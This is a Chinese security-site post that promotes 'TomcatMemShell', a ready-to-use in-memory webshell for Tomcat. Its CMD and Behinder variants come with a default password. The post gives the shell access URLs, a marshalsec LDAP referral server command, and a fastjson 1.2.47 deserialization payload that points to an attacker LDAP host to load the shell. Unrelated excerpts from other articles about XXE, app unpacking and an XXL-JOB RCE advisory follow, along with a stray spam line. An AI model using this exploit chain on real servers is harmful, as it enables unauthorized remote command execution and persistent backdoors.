<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    拿來即用的內存馬 -- TomcatMemShell

    VSole2022-09-10 06:22:13

    一、工具簡介

    拿來即用的Tomcat7/8/9/10版本Listener/Filter/Servlet內存馬,支持注入CMD內存馬和冰蝎內存馬。

    二、使用方法

    1、Listener型/Filter型:

    CMD內存馬URL:xx.xx.xx.xx/?chan=whoami
    冰蝎內存馬URL:xx.xx.xx.xx/     默認連接密碼:goautomne
    

    2、Servlet型:

    CMD內存馬URL: xx.xx.xx.xx/p?chan=whoami
    冰蝎內存馬URL: xx.xx.xx.xx/p     默認連接密碼:goautomne
    

    三、利用舉例

    以fastjson1.2.47版本的反序列化漏洞為例,將對應Tomcat版本的class文件,這里以ILRain.class為例,上傳到web服務器,并開啟LDAP服務

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xx.xx.xx.xx/#ILRain 9102
    

    然后再打入fastjson漏洞的poc,就可以使用冰蝎客戶端去連接了

    {
        "a":{
            "@type":"java.lang.Class",
            "val":"com.sun.rowset.JdbcRowSetImpl"
        },
        "b":{
            "@type":"com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName":"ldap://xx.xx.xx.xx:9102/123",
            "autoCommit":true
        }
    }
    

    四、下載地址

    項目地址:https://github.com/ce-automne/TomcatMemShell

    xx
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    xml基礎知識要了解xxe漏洞,那么一定得先明白基礎知識,了解xml文檔的基礎組成。XML用于標記電子文件使其具有結構性的標記語言,可以用來標記數據、定義數據類型,是一種允許用戶對自己的標記語言進行定義的源語言。1,元素元素是 XML 以及 HTML 文檔的主要構建模塊,元素可包含文本、其他元素或者是空的。
    本篇主要思路及方法來自于bit4woo和CC11001100兩位巨佬的成果。學習鏈接https://github.com/bit4woo/burp-api-drops
    對于當前的APP來說,基本都采用了加殼這一方式來對APP進行加固,這也是在算法分析上需要過的第一個點。在挖洞過程中,主要還是針對業務層邏輯進行分析處理,尋找漏洞點。因此本篇利用某園這一APP,側重點在于對脫殼原理的介紹和一些脫殼工具的分享和使用。
    將脫殼后的dex文件在jadx打開,由于脫殼后會產生多個dex,因此先用腳本合并一下比較方便。當然最新版jadx支持增加文件,也可以直接添加。
    鑒于漏洞危害較大,建議客戶盡快采用處置建議或使用奇安信產品解決方案。默認情況下XXL-JOB的API接口沒有開啟相關認證,未授權的攻擊者可構造惡意請求,造成遠程執行命令,直接控制服務器。漏洞利用無需登錄,實際風險極高,奇安信CERT建議XXL-JOB 用戶盡快采取相關措施緩解漏洞攻擊。奇安信開源衛士已更新 奇安信開源衛士通過更新到20201027. 467版本,支持對XXL-JOB未授權遠程命令執行漏洞的檢測。
    --第一行是XML聲明-->. --這是XML處理指令的例子。后的第一個單詞是處理指令名,在本例中是xml-->. --處理指令一定要頂格寫,前面不能有任何空白-->. XML文檔必須有且只有一個根元素。version特性表明這個文檔符合XML 1.0規范。0x02:實體實體叫ENTITY,實體的作用是避免重復輸入。0x03:處理指令PI處理指令用于XML解析器傳遞信息到應用程序。這些文本將被解析器檢查實體以及標記。
    禁用XXE處理漫談
    2023-03-13 10:52:32
    近期準備面試題時,XXE漏洞防范措施(或者說修復方式)在一些文章中比較簡略
    引言XXL-JOB是一個分布式任務調度平臺,其核心設計目標是開發迅速、學習簡單、輕量級、易擴展。現已開放源代碼并接入多家公司線上產品線,開箱即用。XXL-JOB v2.2.0及以下版本API接口存在Hessian2反序列化漏洞,可通過相關利用鏈結合JNDI注入實現RCE。
    任務模塊專注于任務的執行等操作,開發和維護更加簡單和高效;接收“調度中心”的執行請求、終止請求和日志請求等。XXL-JOB的不同任務之間并行調度、并行執行。同時支持任務終止。當任務”路由策略”選擇”故障轉移”時,當調度中心每次發起調度請求時,會按照順序對執行器發出心跳檢測請求,第一個檢測為存活狀態的執行器將會被選定并發送調度請求。
    正文首先進入主頁是這個樣子F12也沒找到啥接口。注入也無。。。。搜到一個人力資源管理系統F12有驚喜,這里背景圖片居然是download+id。然后順勢遍歷一波ID。拿到賬號密碼,回去科研管理系統登陸一波所有功能都點一遍,熟悉下環境看這URL。。這套系統還是Asp的。。后端應該就是IIS+Asp+SqlServer熟悉了下語句,后端應該是select xxxx from xxxx where 1=1 +and+left>=12++and++ and ProjLevel=*03*. 直接用base64解碼寫入了,省去了很多煩惱當我訪問時,卻是500??
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类